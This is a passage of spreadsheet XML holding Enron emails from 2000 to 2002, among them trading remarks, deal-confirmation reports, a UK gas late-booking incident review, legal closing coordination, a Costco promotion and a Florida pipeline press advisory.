_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 02:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Schedule</t>
  </si>
  <si>
    <t xml:space="preserve">did you have comments, because all i got was a blank e-mail._x000D_
_x000D_
&gt;&gt;&gt; &lt;Mark.Guzman@enron.com&gt; 04/23/01 05:41PM &gt;&gt;&gt;_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Jun 2001 08:10:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: CIG Storage in August</t>
  </si>
  <si>
    <t xml:space="preserve">Theresa,_x000D_
_x000D_
You're gonna kill me, but I left all my T-account notes at home this morning.  Can you shoot me the FUGG breakdown again?_x000D_
_x000D_
Thanks,_x000D_
Susan_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 06:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">the end of the season is typically the best month to hold. Even if the first _x000D_
part of the summer is weak, people will be hesistant to sell the back half.  _x000D_
Same with the winter.  That's why I'm long H2.  It has good correlation with _x000D_
the front on up moves and tends to hold value on the down move._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Vladimir Gorny                           02/12/2001 02:44 PM_x000D_
	_x000D_
_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Why Oct-01 and not any other Winter month? Vlady._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 15:02:12 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'costconews@mail.costco.com'})</t>
  </si>
  <si>
    <t>Special Offers from Costco.com</t>
  </si>
  <si>
    <t xml:space="preserve">Happy holidays from costco.com!_x000D_
_x000D_
We're pleased to offer our members an exciting selection _x000D_
of special offers to celebrate the season. Click here to view:_x000D_
http://www.costco.com/landing.asp?landSrc=email&amp;campaign=3_x000D_
_x000D_
If you do not wish to receive these exciting offers in the future,_x000D_
please follow the unsubscibe instructions below._x000D_
_x000D_
============================================================_x000D_
+++   COSTCO.COM SPECIAL OFFERS INCLUDE:   +++_x000D_
============================================================_x000D_
_x000D_
+ Sharp 7" Portable DVD/CD Player [# 408624]_x000D_
$499.99 - $50 Rebate = $449.99 (plus shipping &amp; handling)_x000D_
_x000D_
+ Sony DVD/CD Player [# 399868] _x000D_
$169.99 (plus shipping &amp; handling) _x000D_
_x000D_
+ Dr. Suess' "How the Grinch Stole Christmas" on DVD [# 407418] _x000D_
$18.49 (plus shipping &amp; handling)_x000D_
_x000D_
+ Rogar Estate Wine Opener [# 96842] _x000D_
$64.99 (plus shipping &amp; handling)_x000D_
_x000D_
_x000D_
TO VIEW OTHER SPECIAL OFFERS, CLICK HERE:_x000D_
============================================================_x000D_
http://www.costco.com/landing.asp?landSrc=email&amp;campaign=3_x000D_
============================================================_x000D_
_x000D_
If you cannot click on the URL within this message, please_x000D_
copy and paste it into your browser._x000D_
_x000D_
When you submitted your rebate form, you provided Costco with your email_x000D_
address. Occasionally, you will receive brief announcements regarding_x000D_
new items and services. If you choose not to receive these_x000D_
announcements, please_x000D_
FORWARD this message to unsubscribe@mail.costco.com with "unsubscribe"_x000D_
in the subject header. Please do not click REPLY._x000D_
_x000D_
Product prices and availability are subject to change without notice. If_x000D_
a link takes you to the costco.com homepage instead of the specific_x000D_
product page, that product may no longer be available._x000D_
_x000D_
* Instant coupon is a manufacturer's coupon, which will automatically be_x000D_
applied at checkout._x000D_
_x000D_
If you need assistance, please e-mail us at customerservice@costco.com._x000D_
_x000D_
Costco Wholesale, Customer Service, P.O. Box 34535,_x000D_
Seattle, WA.98124-1535_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 08:41:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({"'todd'.delahoussaye@enron.com"})</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'ajay.sharma@enron.com', 'patrick.mulvany@enron.com', 'nidia.mendoza@enron.com', 'ellen.wallumrod@enron.com', 'c..gossett@enron.com', 'tanya.rohauer@enron.com', 'jackson.logan@enron.com', 'richard.deming@enron.com', 'wendi.lebrocq@enron.com', 'stewart.range@enron.com', 'reporting.exception@enron.com', 'brant.reves@enron.com', 'jeff.royed@enron.com', 's..theriot@enron.com', 'jean.bell@enron.com', 'sandy.olitsky@enron.com', 'd..sorenson@enron.com', 'nick.moshou@enron.com', 'shifali.sharma@enron.com', 'lisa.hesse@enron.com', 'keynan.dutton@enron.com', 'luchas.johnson@enron.com', 'm..scott@enron.com', 'lesli.campbell@enron.com', 'errol.mclaughlin@enron.com', 'michelle.nelson@enron.com', 'kam.keiser@enron.com', 'bianca.ornelas@enron.com', 'veronica.espinoza@enron.com', 'laura.vargas@enron.com', 'rudwell.johnson@enron.com', 'paul.radous@enron.com', 'randy.bhatia@enron.com', 'leslie.reeves@enron.com', 'derek.bailey@enron.com', 'credit &lt;.williams@enron.com&gt;', "'todd'.delahoussaye@enron.com"})</t>
  </si>
  <si>
    <t>TD+1, 11-21-01</t>
  </si>
  <si>
    <t xml:space="preserve">The below is a list of Monday, November 19th deals in which the Confirmation was not sent by COB on November 20th (T/D + 1)_x000D_
_x000D_
 Financial and Physical			_x000D_
Total Deals	=	3921	_x000D_
Total Deals Not Sent	=	11	_x000D_
Fax Processing	=	0	_x000D_
Fax Failure	=	3	_x000D_
System Failure	=	3	_x000D_
Percentage sent to C/P	=	99.72%	_x000D_
_x000D_
External CP     	Deal No.   	Status       	Reason               	Book Admin	Confirm	Comm   	_x000D_
DOUGEVA        	YJ7694.2  	Generated   	Unwind of previous deal	Vusal N.	Celeste C.	CL    	_x000D_
SAMEDAN        	YK4520.1  	Generated   	Pending Verbal by Derek	Amy C.	Bianca O.	NG    	_x000D_
PGEENETRAGAS   	YK9533.1  	New deal    	Review by Price Desk	Daniel T.	Bianca O.	NG    	_x000D_
PGEENETRAGAS   	YK9533.2  	New deal    	Review by Price Desk	Daniel T.	Bianca O.	NG    	_x000D_
DOUGEVA        	YK4137.1  	Pending     	Pending Verbal by Derek	Thunderball Bridge	Celeste C.	CL    	_x000D_
SEMPRAENETRA   	YK6085.1  	Pending     	canadian Rebook	Chad B.	canada	NGGJ  	_x000D_
BANKAMENAT     	YK6086.1  	Pending     	canadian Rebook	Chad B.	canada	NGGJ  	</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 04:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jhudacko@ipass.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff- _x000D_
Glad to have you along for the ride last night- hopefully Charlotte is not _x000D_
too jealous that I am pilfering her ridership._x000D_
_x000D_
Just wanted to see if you could mail me the phone numbers which you have been _x000D_
dialing in SF and Medocino that are giving you trouble so our network group _x000D_
can run a quality audit._x000D_
_x000D_
Thanks and see you at school. _x000D_
Jonathan _x000D_
_x000D_
Jonathan Hudacko _x000D_
Product Marketing_x000D_
iPass Inc.???? &lt;http://www.ipass.com/&gt; _x000D_
E-mail: jhudacko@ipass.com_x000D_
3800 Bridge Parkway, Redwood Shores, CA? 94065? USA _x000D_
Tel: (650) 232-4383???? Fax: (650) 232-0227 _x000D_
</t>
  </si>
  <si>
    <t>Sun, 22 Jul 2001 16:29:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'f..herod@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kenny.ha@enron.com', 'chris.stokley@enron.com'})</t>
  </si>
  <si>
    <t>FW: Metered Usage</t>
  </si>
  <si>
    <t xml:space="preserve">As part of Project Ranger, it is my goal to have a single repository to house all actual data, allowing users to access data through an ad hoc reporting tool.  Additionally, as areas identify needs, I would hope that we can develop feeds rather than just ad hoc reporting._x000D_
 _x000D_
We are setting up a meeting with CSC for this Wednesday to discuss the needs and start defining Iteration 2 of the project.  Vivian forwarded me this meeting that you have already set-up.  My question:  Without knowing the full scope of your efforts, I'd like to propose a single initiative to obtain actuals.  Additionally, we wanted to set-up this meeting for Wednesday when the CSC business analyst is in town.  Do you think it would be advantageous to combine the meetings, and schedule it for Wednesday?  _x000D_
 _x000D_
We will move forward with our efforts and will schedule a meeting for Wednesday.  If you all want to combine efforts, please let me know and we will include you on the meeting._x000D_
 _x000D_
Chris - I had already included both you and Murray on the invitation listing.  Will you forward this E-mail to him?  I'm having problems trying to call up his E-mail address._x000D_
 _x000D_
Please let me know.  _x000D_
_x000D_
-----Original Message----- _x000D_
From: Hart, Vivian _x000D_
Sent: Fri 7/20/2001 5:12 PM _x000D_
To: Herod, Brenda F. _x000D_
Cc: _x000D_
Subject: Metered Usage_x000D_
_x000D_
_x000D_
_x000D_
Kenny Ha who works for Anthony is already setting a meeting with the Portland guys on this._x000D_
_x000D_
Should you just attend this meeting or do you still want to have a separate meeting.  Kevin_x000D_
_x000D_
Crippen is not going to be in until Wednesday though._x000D_
_x000D_
---------------------- Forwarded by Vivian Hart/HOU/EES on 07/20/2001 04:59 PM ---------------------------_x000D_
_x000D_
Alarm enabled: an alarm will occur 10 minutes before the start time of this entry._x000D_
_x000D_
        Calendar Entry _x000D_
_x000D_
_x000D_
_x000D_
Brief description:_x000D_
_x000D_
Date:_x000D_
_x000D_
Time:_x000D_
_x000D_
EB1114 / CSC Metering Data_x000D_
_x000D_
07/24/2001_x000D_
_x000D_
10:00 AM - 11:00 AM_x000D_
_x000D_
_x000D_
Detailed description:_x000D_
_x000D_
Kenny Ha, Todd Taylor, John Rutledge, Maurice Winter, Vivian Hart, Chris Stokley, Murray O'Neil_x000D_
_x000D_
Invitations have been sent to:  Todd Taylor/HOU/EES, John Rutledge/HOU/EES, Maurice Winter/HOU/EES, Vivian Hart/HOU/EES, Chris Stokley/HOU/ECT, Murray P O'Neil/HOU/ECT_x000D_
_x000D_
__________________________________________________________________________x000D_
_x000D_
Chairperson:    Kenny Ha/HOU/EES_x000D_
_x000D_
Sent by:        Melinda Winkler/HOU/EES_x000D_
_x000D_
This meeting repeats   starting on    (if the date occurs on a weekend the meeting )._x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 05:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Assignment Provisions in GE Breakouts - Important</t>
  </si>
  <si>
    <t xml:space="preserve">okey dokey_x000D_
_x000D_
_x000D_
From: Roseann Engeldorf on 11/14/2000 01:46 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Assignment Provisions in GE Breakouts - Important_x000D_
_x000D_
Kay - I know ENA is planning to hand the breakout K to ESA as a done deal, _x000D_
but Lisa Alfaro really should at least get a look at the assignment _x000D_
provisions so Brett and Enron can know what his constraints are with respect _x000D_
to a possible sale of all the SA assets, as well as the ease with which they _x000D_
can go into the Elektrobolt project.  _x000D_
_x000D_
Could you send that portion of the contract to her?_x000D_
_x000D_
I have asked Lisa and Brett to confirm that their understanding about the _x000D_
deal is the same as  Ben's. _x000D_
_x000D_
Rose_x000D_
----- Forwarded by Roseann Engeldorf/Corp/Enron on 11/14/2000 01:42 PM -----_x000D_
_x000D_
	Ben F Jacoby@ECT_x000D_
	Sent by: Ben Jacoby@ECT_x000D_
	11/14/2000 01:36 PM_x000D_
		_x000D_
		 To: Roseann Engeldorf/Corp/Enron@ENRON_x000D_
		 cc: Brett R Wiggs/SA/Enron@Enron, Sheila Tweed/HOU/ECT@ECT, Kay _x000D_
Mann/Corp/Enron@Enron_x000D_
		 Subject: Re: Important - Second Closing - LM6000s_x000D_
_x000D_
Rose:_x000D_
_x000D_
Sheila provided final comments on the option agreement a couple of days ago. _x000D_
I believe it's in Lisa Alfaro's court._x000D_
_x000D_
GE is on board, and I think the final breakout contract should be completed _x000D_
this week. Kay Mann / Sheila Tweed are coordinating with GE, and I will defer _x000D_
to them on this point._x000D_
_x000D_
I think that's it. _x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
From: Roseann Engeldorf@ENRON on 11/14/2000 11:54 AM_x000D_
To: Brett R Wiggs/SA/Enron@Enron, Ben Jacoby/HOU/ECT@ECT_x000D_
cc: "ROB TAYLOR" &lt;TAYLR@andrews-kurth.com&gt;, Lisa Bills/Corp/Enron@ENRON, Kay _x000D_
Mann/Corp/Enron@Enron, Lisa Alfaro/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Tammy _x000D_
Brennig/NA/Enron@Enron, Mary Kimball/NA/Enron@Enron, Mary _x000D_
Cilia/NA/Enron@Enron, Cheryl Lipshutz/HOU/ECT@ECT, Peter N _x000D_
Anderson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, "Mark Thurber" _x000D_
&lt;MTHURBER@skadden.com&gt;, Jordan Mintz/HOU/ECT@ECT, fporto@andrews-kurth.com, _x000D_
pseve@andrews-kurth.com, Gina Karathanos/Corp/Enron@Enron, Kay _x000D_
Mann/Corp/Enron@Enron, Sheila Tweed/HOU/ECT@ECT, Mary Kimball/NA/Enron@Enron, _x000D_
Matthew F Gockerman/HOU/ECT@ECT, Nancy Muchmore/NA/Enron@Enron _x000D_
Subject: Important - Second Closing - LM6000s_x000D_
_x000D_
Ben and Brett -_x000D_
_x000D_
I do not know your target timing to move the LMs; however, you need to be _x000D_
aware that funding from the bank structure to pay for them requires that we _x000D_
go through a full second closing process.  It may take several days to pull _x000D_
together all the documents and information needed for this closing - we will _x000D_
have to deliver Brazil counsel opinions, Cayman counsel opinions, another A&amp;K _x000D_
opinion and deliver a multitude of other corporate and security documents too _x000D_
boring to list here. _x000D_
_x000D_
So - as soon as:_x000D_
_x000D_
1)  the break-out contract is ready; _x000D_
_x000D_
2) GE is on board; and _x000D_
_x000D_
3) ESA, ENA and WLB have signed off on the purchase option transfer _x000D_
document(s) (which must include Matt,  Mary Kimball and Mary Cilia _x000D_
sign-off),  _x000D_
_x000D_
we can finalize the "second closing" docs for the bank - we have already _x000D_
started on them, but it will take a focused effort to finish them and receive _x000D_
all signatures necessary.  _x000D_
_x000D_
Ben and Brett must let Rob Taylor of A&amp;K - at 713-220-4436 know when the _x000D_
above items are complete - he will need to coordinate with the team to push _x000D_
for final docs._x000D_
_x000D_
Lisa Alfaro - will you please coordinate with Rob Taylor at the above number _x000D_
and Frederico Porto at A&amp;K in Dallas at 214-659-4447 on the Brazil-based _x000D_
issues? _x000D_
 _x000D_
I also ask that Ben and Brett be available to the deal team to consult and _x000D_
answer questions as necessary._x000D_
_x000D_
I am going to be out of town for a week on another year-end deal and will _x000D_
check my voice mails regularly.   My assistant, Melba Trevino at 835-7664 _x000D_
will have my contact details._x000D_
_x000D_
Please call Rob, me or Tammy (345-3870) with any questions._x000D_
_x000D_
_x000D_
Rose_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 06:24:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kenneth.lay@enron.com', 'rosalee.fleming@enron.com'})</t>
  </si>
  <si>
    <t>REVISED after discussion with J. McMahon</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff McMahon has proposed that Ben Glisan is the most appropriate person to provide brief summaries to the BoD on Chewco, Whitewing and Marlin, if Ken would like these topics presented to the BoD.  Both Jeff and Ben will be standing by for today's meeting in case they are needed.  Joe Dilg will attend the full meeting, most likely via teleconference.  _x000D_
_x000D_
Following is a revised note to Ken.  Thanks._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 13 Jun 2000 02:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.port@enron.com'})</t>
  </si>
  <si>
    <t>Re: UK Gas late deal input and deal booking errors - o1.1m hit</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks David,_x000D_
_x000D_
I am addressing the 'undue influence' issue via the PRC process, but we all _x000D_
know that this is a partial solution - it's about changing the culture _x000D_
(Europe isn't any better or worse in this respect) and this is a more _x000D_
intransigent problem that we need to work at every single day (I have to say _x000D_
that the Helsinki scare was really helpful in this respect - I think you _x000D_
would notice a difference)._x000D_
_x000D_
I'll ask James and Mike to follow up on your specific points._x000D_
_x000D_
Regards_x000D_
_x000D_
Fernley_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
From:  David Port @ ENRON                                                     _x000D_
        12/06/2000 19:35	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Fernley Dyson/LON/ECT@ECT_x000D_
cc: Steve W Young/LON/ECT@ECT, Ted Murphy/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: UK Gas late deal input and deal booking errors - o1.1m hit  _x000D_
_x000D_
_x000D_
Sorry to hear about this one. _x000D_
_x000D_
I have some observations to make from my reading (and re-reading) of the _x000D_
account:_x000D_
_x000D_
1 It looks like the old "undue influence" problem again. It seems some _x000D_
attempts were made by operations to follow up, but nothing happened. _x000D_
_x000D_
We tell our operations staff they have an obligation to dissent but we don't _x000D_
have any way to protect them if they do - there is still the fear that if _x000D_
they upset a trader they can get fired or held back in their career. And that _x000D_
is because twice a year, at the PRC, that can happen. This incident shows _x000D_
some of these attributes._x000D_
_x000D_
For the operations process to be effective there has to be (and be seen to _x000D_
be) little significant influence from Commercial Groups over the ranking of _x000D_
the operations staff. _x000D_
_x000D_
2 Whoever signed off the new deal lists in the DPR should be asked to confirm _x000D_
the basis on which they signed it._x000D_
_x000D_
3 Why wait for the traders to approve payments to brokers ? Brokerage is in _x000D_
the P&amp;L and if operations are satisfied the trades are accurate and brokerage _x000D_
is at the agreed rate, they should simply pay the brokerage._x000D_
_x000D_
4 Two weeks to check telephone tapes is unacceptable - it should be done same _x000D_
day. I would not have waited for the traders to do it, but I would want to _x000D_
know why it took them so long._x000D_
_x000D_
5 Given that these (short) trades were absent from the portfolio during a _x000D_
highly volatile period of rising prices, I would wonder about motivation in _x000D_
addressing the position during this time. Essentially, if it had been correct _x000D_
we would have been reporting losses bigger than the ones we did._x000D_
_x000D_
I would pursue explanations to points 2, 4 and 5. _x000D_
_x000D_
DP_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Fernley Dyson@ECT_x000D_
06/12/2000 02:41 AM_x000D_
To: James New/LON/ECT@ECT_x000D_
cc: Richard Lewis/LON/ECT@ECT, Mike Jordan/LON/ECT@ECT, Robert _x000D_
Yeo/LON/ECT@ECT, Gail Hill/LON/ECT@ECT, Ian Sloman/LON/ECT@ECT, Steve W _x000D_
Young/LON/ECT@ECT, David Port/Market Risk/Corp/Enron@ENRON, Brent A _x000D_
Price/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: UK Gas late deal input and deal booking errors - o1.1m hit  _x000D_
_x000D_
James,_x000D_
_x000D_
Thanks for the note. As described, this is an intolerable situation. I agree _x000D_
your action points, but we need timelines and quantitative measures of _x000D_
compliance/improvement - please could you provide a weekly update on this _x000D_
area specifically and until we are satisfied that things are as they should _x000D_
be._x000D_
_x000D_
On a more general note - let's ensure that the 'Global Standards' address the _x000D_
lapses in timely action/follow-up identified here so that we can monitor _x000D_
performance across the business._x000D_
_x000D_
Fernley_x000D_
_x000D_
_x000D_
_x000D_
James New_x000D_
09/06/2000 10:03_x000D_
To: Richard Lewis/LON/ECT@ECT, Fernley Dyson/LON/ECT@ECT, Mike _x000D_
Jordan/LON/ECT@ECT_x000D_
cc: Robert Yeo/LON/ECT@ECT, Gail Hill/LON/ECT@ECT, Ian Sloman/LON/ECT@ECT _x000D_
_x000D_
Subject: UK Gas late deal input and deal booking errors - o1.1m hit_x000D_
_x000D_
_x000D_
On the 7th of June Gas Risk Management became aware that two'late' trades had _x000D_
been entered into the gas trader's 'Blue book' which were both being booked _x000D_
significantly late and had a material negative P&amp;L impact (negative o1.1m). _x000D_
The 'late' deals were done on the 3rd of February (Marcello Romano) and the _x000D_
30th of March (Haakon Olafson) and were both forward starting sells for _x000D_
periods in 2003-2004._x000D_
_x000D_
Background_x000D_
_x000D_
1) Input errors_x000D_
_x000D_
For some considerable time we have been concerned with the number of deal _x000D_
input errors that have been occurring in the Gas area with the most _x000D_
significant number coming form the UK Gas traders. Numerous errors have been _x000D_
found by documentation and risk management over the accuracy and timeliness _x000D_
of entering deals into the 'blue book' (the Gas traders are currently the _x000D_
only traders in Europe who do not enter their own trades into the valuation _x000D_
system - there is currently a big push to change this which has the support _x000D_
of John Sherriff with a deadline date of 31 July)._x000D_
_x000D_
In the past documentation and gas risk management have repeatedly highlighted _x000D_
booking errors to the gas traders but the error rate has not fallen. A log of _x000D_
all deal input errors has been formally maintained since the beginning of May _x000D_
which highlights an error rate of 12%-15% of non EOL trades. This has been _x000D_
discussed with Richard Lewis and corrective action is expected._x000D_
_x000D_
2) Deal booking and reconciliation process (Non EOL trades)_x000D_
_x000D_
Deals are initially written into the 'blue book' by the gas traders when the _x000D_
deal is done. This book is photocopied several times a day and the deals are _x000D_
the manually input into GasDesk by documentation on the same day._x000D_
_x000D_
Faxed broker statements are received (usually) by documentation the next day _x000D_
and these are reconciled to GasDesk with errors and amendments made by _x000D_
documentation liasing with the traders as necessary. At this time brokers _x000D_
were faxing one statement per trade (relevant later)._x000D_
_x000D_
3) New Deal sign off_x000D_
_x000D_
As part of the daily DPR process a separate new deal sheet is prepared and is _x000D_
signed off by the traders to formally agree the new deals done on the day and _x000D_
the implied origination P&amp;L. For the 3rd of February Marcello signed off the _x000D_
new deals sheet and for the 30th of March Jonathan Whitehead signed off._x000D_
_x000D_
4) Documentation convention_x000D_
_x000D_
In the gas market the convention is that the seller sends deal documentation. _x000D_
(relevant later). Documentation aim to get this out within one the day after _x000D_
trade booking._x000D_
_x000D_
5) Brokerage invoices_x000D_
_x000D_
Brokerage invoices are usually received monthly by settlements who then _x000D_
reconcile the trades on the invoice to the valuation system to ensure the _x000D_
deal is valid before passing the reconciled invoice to the traders to _x000D_
authorise for payment. Any deals which cannot be found are raised with _x000D_
documentation who then investigate and follow up with the traders._x000D_
_x000D_
_x000D_
Specific details of these 'late' trades_x000D_
_x000D_
1) Summary_x000D_
_x000D_
For both these trades no evidence can be found of receiving, or can it be _x000D_
established that we did not receive, a broker statement which is a primary _x000D_
control in agreeing the existence and accuracy of new OTC deals. _x000D_
_x000D_
As Enron was the seller in both cases no documentation was received from _x000D_
either counterparty which would have alerted us to the trade._x000D_
_x000D_
The reconciliation of the brokerage invoices was carried out by settlements _x000D_
in April and was completed by the 20th with the invoices falling due for _x000D_
payment on the 27th. The work practice at that time was that brokerage _x000D_
invoices (including those with non reconciling trade queries) were batched _x000D_
together and passed to the traders. This would have taken place on the 27th _x000D_
of April. Details on exactly what was said and done in the 3 weeks between _x000D_
passing these invoices to the traders for approval (although there are claims _x000D_
that verbal follow up were made on a number of occasions) and when a mailed _x000D_
follow up was made on the 22nd of May are hazy. What is clear is that on the _x000D_
22nd of May Morgan Stanley contacted Enron to try to confirm their position _x000D_
which was when it was realised that an error could well have occurred._x000D_
_x000D_
Over the next two weeks tapes were then checked by the traders with the deals _x000D_
being booked on the 6th of June._x000D_
_x000D_
2) Deal specifics_x000D_
_x000D_
EES Broker - Morgan Stanley trade on 3 Feb 2000_x000D_
Trader Marcello_x000D_
EES Invoice date 1 March; Invoice received before 15 March as settlements _x000D_
started checking it. (Keren Perrott - settlements started on 13 March)_x000D_
Discrepancies sent to documentation on 23 May (Chris Ware to Emma Thomson)_x000D_
Traders contacted  on 24 May after copy of broker confirm was sent on 22 May _x000D_
as requested by documentation to prove deal._x000D_
Deal entered 6 June after traders checked the tapes._x000D_
_x000D_
_x000D_
IEB Broker - NP trade on 30 Mar 2000_x000D_
Trader Haakon_x000D_
IEB invoice date 6 April; Invoice received before 27 April as settlements _x000D_
started checking it. (Keren Perrott)_x000D_
Discrepancies sent to documentation on 23 May (Chris Ware to Robert Vaughn)_x000D_
Traders contacted on 24 May after copy of broker confirm was requested._x000D_
Deal entered 6 June after traders checked the tapes._x000D_
_x000D_
_x000D_
_x000D_
 Who was at fault and where did the control break down ?_x000D_
_x000D_
I do not feel it is constructive to try to attach blame for what happened but _x000D_
there are lessons to be learned and general observations and conclusions that _x000D_
can be made and drawn._x000D_
_x000D_
Firstly there are major concerns over the Gas trader's accuracy and _x000D_
prioritisation of booking trades. Despite numerous conversations on the _x000D_
subject very little improvement has been seen. It has now got to the stage _x000D_
where documentation are formally recording all errors including what the _x000D_
error was and who made it. This is now being communicated to Richard Lewis _x000D_
every two weeks with the aim being not only to reduce the amount of time _x000D_
trade support spend correcting errors and re running DPRs but also to try to _x000D_
avoid the incidence of errors such as this. The current error rate is 12% - _x000D_
15% of non EOL trades. Documentation currently estimate that in 9 times out _x000D_
of 10 the broker or counterparty are correct._x000D_
_x000D_
Secondly around a month ago we contacted brokers and asked for them to _x000D_
provide us with one statement per day rather than one per deal which will _x000D_
eliminate any lost statements or missed deals as it will be immediately _x000D_
obvious when a statement from a broker has not arrived. Most brokers have now _x000D_
changed but one or two still send one statement per trade. Reconciliation's _x000D_
of these daily statements to GasDesk are evidenced._x000D_
_x000D_
Thirdly it has been impressed on both documentation and settlements to follow _x000D_
up more vigorously (and by mail) errors and omissions on a more timely basis. _x000D_
There is however a backlog or broker invoices which have have been checked by _x000D_
settlements but have nto been checked or approved by the traders. This is _x000D_
causing concern at the brokers who are chasing payment._x000D_
_x000D_
Action Points_x000D_
_x000D_
Trading_x000D_
_x000D_
Traders to input their own deals directly into GasDesk_x000D_
_x000D_
Traders to improve their accuracy of deal booking_x000D_
_x000D_
Traders to approve invoices on a more timely basis_x000D_
_x000D_
Trade Support_x000D_
_x000D_
Settlements to clear backlog of broker invoices_x000D_
_x000D_
Documentation to chase brokers to send daily deal statements not individual _x000D_
deal statements_x000D_
_x000D_
All follow ups to be evidenced with mails used as appropriate_x000D_
_x000D_
Documentation to check all trades since the beginning of the year versus the _x000D_
broker records_x000D_
_x000D_
Documentation to perform a reconciliation with all counterparties to agree _x000D_
our forward position from July 2000 to September 2006 (the traded part of the _x000D_
curve)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 00:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">hey mom. i forgot to tell you that i could use a portable phone w/ caller _x000D_
id.  i don't have either.  this is just a suggestion if you haven't finished _x000D_
shopping.  see you tomorrow.  </t>
  </si>
  <si>
    <t>Mon, 21 Jan 2002 20:36:28 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/21/02; HourAhead hour: 23;  HourAhead schedule download failed. Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002012123.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5 Jan 2000 05:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jantom65@yahoo.com'})</t>
  </si>
  <si>
    <t>Wedding List</t>
  </si>
  <si>
    <t>Kevin,_x000D_
_x000D_
Give me a call when you get a chance.  I want to talk_x000D_
to you before I call Lisa about the list.  My work_x000D_
number is 609-387-5972._x000D_
_x000D_
Love,_x000D_
_x000D_
Mom_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Talk to your friends online with Yahoo! Messenger._x000D_
http://messenger.yahoo.com</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 03:22:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'emaildelivery@businesswire.com'})</t>
  </si>
  <si>
    <t>frozenset({'tx-industrial-info-res@businesswire.com'})</t>
  </si>
  <si>
    <t>First New Natural Gas Pipeline System to Serve Florida in Over 40_x000D_
 Years is Under Construction, in an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2028  OCT 26,2001       3:21 PACIFIC      06:21 EASTERN_x000D_
_x000D_
_x000D_
( BW)(TX-INDUSTRIAL-INFO-RES) First New Natural Gas Pipeline System_x000D_
to Serve Florida in Over 40 Years is Under Construction, in an_x000D_
Advisory by Industrialinfo.com_x000D_
_x000D_
    Business/Energy Editors_x000D_
_x000D_
	   HOUSTON--(BUSINESS WIRE)--Oct. 26, 2001--The following is an_x000D_
advisory by Industrialinfo.com (Industrial Information Resources,_x000D_
Inc., Houston, Texas). Gulfstream Natural Gas System L.L.C. (Houston)_x000D_
began construction on the 753 mile long Gulfstream pipeline in July of_x000D_
2001. The pipeline originates near Pascagoula, Miss., and terminates_x000D_
in Palm Beach County, Fla. When completed the 753 mile natural gas_x000D_
transmission pipeline will consist of 431 miles of 36" diameter_x000D_
offshore pipeline and 306 miles of varying diameter (16" to 36")_x000D_
onshore pipeline mostly located in Florida. The massive pipe weighs_x000D_
eight tons per 40-foot section._x000D_
	   The support facilities for this $1.6 billion venture include a_x000D_
natural gas processing plant and a 120,000 horsepower compressor_x000D_
station near Coden, Ala. Approximately 200 miles of the offshore_x000D_
portion have been laid by three lay barges and the compressor station_x000D_
was 17 percent complete as of Oct. 1, 2001. Similar progress has been_x000D_
made on the onshore portion in Florida._x000D_
	   Once completed in June 2002, Gulfstream will be the largest_x000D_
pipeline in the Gulf of Mexico and will initially transport 1.1_x000D_
billion cubic feet per day of natural gas to supply Florida's growing_x000D_
gas-fired electrical generation needs. This new pipeline will help_x000D_
satisfy Florida's need for 25 percent more electrical generation by_x000D_
2007 and the 179 percent increase in demand for natural gas over the_x000D_
next decade._x000D_
	   Gulfstream Natural Gas System L.L.C. is a joint energy development_x000D_
